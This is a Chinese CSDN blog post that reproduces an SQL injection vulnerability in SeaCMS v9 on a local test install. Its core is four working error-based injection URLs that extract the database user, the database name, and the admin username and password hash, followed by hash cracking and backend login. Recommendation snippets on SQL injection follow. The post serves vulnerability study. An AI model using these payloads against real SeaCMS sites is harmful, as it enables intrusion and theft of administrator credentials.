seacmsv9 SQL注入漏洞

于 2025-03-11 00:30:00 发布
阅读量192 收藏 3
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/flyqwd/article/details/146167444
版权

1.1seacms漏洞介绍
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist

1.2漏洞绕过
由于seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为 sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password

1.3尝试注入
我们进行sql语句构造报错注入出user

http://localhost/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),`%27`

发现成功进行报错注入

进行数据库名的报错注入

http://localhost/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@`%27`

获取数据库名成功

获取管理员的第一个用户

http://localhost/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27​​​​​​

获取密码

http://localhost/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`​​​​​​

进行MD5解密

得到用户名admin,密码admin

成功进入后台。注入成功。

QF陆 远
关注
Java审计之SQL注入
qq_36594628的博客
08-06 731
Java审计之SQL注入 一、什么是SQL注入 定义 ​ SQL是操作数据库数据的结构化查询语言,web应用程序的应用数据与后台数据库中的数据产生交互时会采用SQL。而SQL注入SQL Injection)是当开发未对web应用程序用户可控输入的参数、web表单、cookie等(即注入点)进行规范性校验、过滤和数据清洗,将用户输入的参数以拼接的方式带入了SQL语句中,造成了SQL注入的产生。攻击者通过构造特殊的payload,后端程序以拼接的方式将payload带入SQL语句中,数据库执行拼接的SQL
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
海洋 CMS V9SQL注入漏洞
最新发布
m0_74848570的博客
02-25 707
是一种用于在 XML 或 HTML 文档中定位和提取数据的语言。它通过路径表达式(Path Expression)来导航文档树,支持复杂的数据查询和提取。
java代码审计之SQL注入漏洞
goddemon
02-18 1391
开更文章了,开一个关于Java代码审计相关的系列。本来是想写成一本书的模式的,但是越写越发觉,篇幅太多,想了下还是每个专题单独写,而后最后汇总到一起。慢慢写,基于笔者的理解抒写,如有问题,忘斧正。关于这个系列不会可能有些不会写修复方案,也不会写得特别细,这类文章外面太多了。重点是思路和思考。
JAVA- SQL注入案例(黑马程序员)和避免 超级详细
meini32的博客
08-01 3567
SQL 注入SQL Injection)是一种常见的网络攻击技术,它利用应用程序没有正确过滤用户输入的数据,将恶意的 SQL 代码注入到应用程序中执行,从而导致应用程序的安全性受到威胁。通过一段字符串(伪造的sql代码)与真的代码进行拼接使整个 SQL语句的条件判断永远为真,从而绕过了应用程序的身份验证机制,获取了用户的数据。应用程序需要对用户输入的数据进行正确的验证和过滤!-概括:拼字符串导致分不清参数和执行的关键字!PreparedStatement接口。输入正确的用户名和密码=登录成功。
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入是网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
SQL注入漏洞原理及注入示例
m0_62480631的博客
03-10 2389
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感信息,甚至危险的代码或系统指令。
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1514
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
java程序中常见的漏洞类型
G探险者的博客
03-29 1923
需要注意的是,以上示例仅仅是每个漏洞类型的一个简单示例,实际的漏洞可能会更加复杂,攻击者也会不断地创造新的攻击方式来绕过应用程序的防御措施。是一种常见的Web安全漏洞,攻击者通过注入恶意代码到网页中,使得这些代码被其他用户的浏览器执行,从而攻击用户的计算机系统.存储型XSS:攻击者将恶意代码存储在服务器上的数据库中,当其他用户访问相应的页面时,这些代码会被读取并执行,从而攻击用户。当其他用户访问该页面并搜索该关键词时,这段恶意代码就会被服务器返回给用户的浏览器执行,从而弹出一个警告框,对用户进行攻击。
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6669
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
网络安全必学SQL注入
kali_Ma的博客
11-04 7543
如果使用参数化查询,则在SQL语句中使用占位符表示需在运行时确定的参数值。当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题,如果没有对用户输入的内容做过滤,势必会产生SQL注入漏洞。至此,整个功能流程结束,在我们跟进的过程中,代码中无任何过滤语句,获取参数值,调用update方法更新,更新成功后返回结果。
【Java 代码审计入门-02】SQL 漏洞原理与实际案例介绍
shaozheng0503的博客
12-26 1394
SQL注入是一种代码注入技术,它允许攻击者通过操纵Web应用程序的输入字段来执行非授权的SQL命令。这种攻击方式利用了应用程序对用户输入缺乏充分验证或过滤的问题,使得恶意构造的SQL语句得以绕过数据库的安全机制,直接与数据库进行交互。由于网上缺乏系统的Java代码审计教程,本文旨在为初学者提供一系列有关Java代码审计的学习资料,涵盖从环境搭建到各类漏洞(如SQL注入、XSS等)的分析与防范。希望通过这一系列文章,读者能够掌握基本的Java代码审计技能。OFCMS是一款基于Java的内容管理系统。
SQL注入漏洞的分析及解决(java)
m0_51295053的博客
07-14 1440
SQL注入漏洞的分析及解决1,SQL注入漏洞的演示2,SQL注入漏洞产生的原因3,SQL注入漏洞的解决方案(Java) 1,SQL注入漏洞的演示 2,SQL注入漏洞产生的原因 3,SQL注入漏洞的解决方案(Java) 一,SQL注入漏洞演示 1),数据库中用户和密码 2),验证登陆和sql拼接 模拟登陆验证页面 内联代码片。 package jdbcTest.jdbc.demo4; import java.sql.Connection; import java.sql.ResultSet; im
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
11-14 3549
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
海洋cms v6.53 v6.54版本漏洞复现
weixin_44897902的博客
09-15 2512
参考 https://www.freebuf.com/vuls/150042.html https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg cms首页地址为:http://139.155.1.64/seacms(v6.53)/upload/ 漏洞存在地址为:http://139.155.1.64/seacms(v6...
SQL注入漏洞演示与防范教程
SQL注入漏洞是指应用程序在处理用户输入数据时,未能正确地对输入数据进行过滤和转义,导致用户可以通过输入恶意的SQL代码片段,与应用程序的SQL语句拼接并执行,从而对数据库进行非法操作。任何接受用户输入并将其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值